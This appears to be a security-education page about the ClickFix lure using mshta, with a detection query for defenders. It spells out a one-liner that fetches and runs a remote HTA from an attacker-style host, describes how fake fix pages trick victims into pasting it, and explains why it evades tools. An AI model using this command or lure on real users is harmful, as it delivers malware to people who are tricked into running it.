Clickfix MSHTA

Execute a remote HTA (HTML Application) via mshta. Commonly delivered by clickfix. The HTA can run PowerShell, download payloads, or perform other actions.

This command runs on Windows
Example Command breakdown
Hover over highlighted segments to see what each part does.
mshta https://fix-support.to/p.hta
1HTA host

Built-in Windows binary (LOLBin) that runs HTML Applications and VBScript. Trusted process, often whitelisted.

mshta 
2Remote HTA URL

URL of the attacker-controlled HTA file. mshta fetches it and executes the VBScript/JScript inside.

https://fix-support.to/p.hta
How it works
The attack chain from victim execution to payload delivery
  1. 1

    Victim runs the command

    The mshta one-liner is presented on a fake support or fix page. The page copies the command to the clipboard, then prompts the victim to press Win+R, Ctrl+V, and Enter.

  2. 2

    Fetch and execute HTA

    mshta fetches the HTA from https://fix-support.to/p.hta and executes it. No download dialog. The HTA contains VBScript or JScript that can run PowerShell, download payloads, or perform other actions.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • LOLBin. mshta is a built-in Windows binary. Trusted process name, often whitelisted by security tools.
  • No download dialog. Unlike a browser download, mshta fetches and runs in one step. Less user friction.
  • Full script control. The HTA can contain any VBScript/JScript. Change the file at the URL and the same command delivers a different payload.
  • Attacker-controlled at any time. Update the HTA on the server. No need to redistribute links or documents.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to run the command via Win+R, Ctrl+V, Enter.Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Launch demo
Hunting
Detection queries for mshta with remote URL
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "mshta.exe"
  and ProcessCommandLine contains "http"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine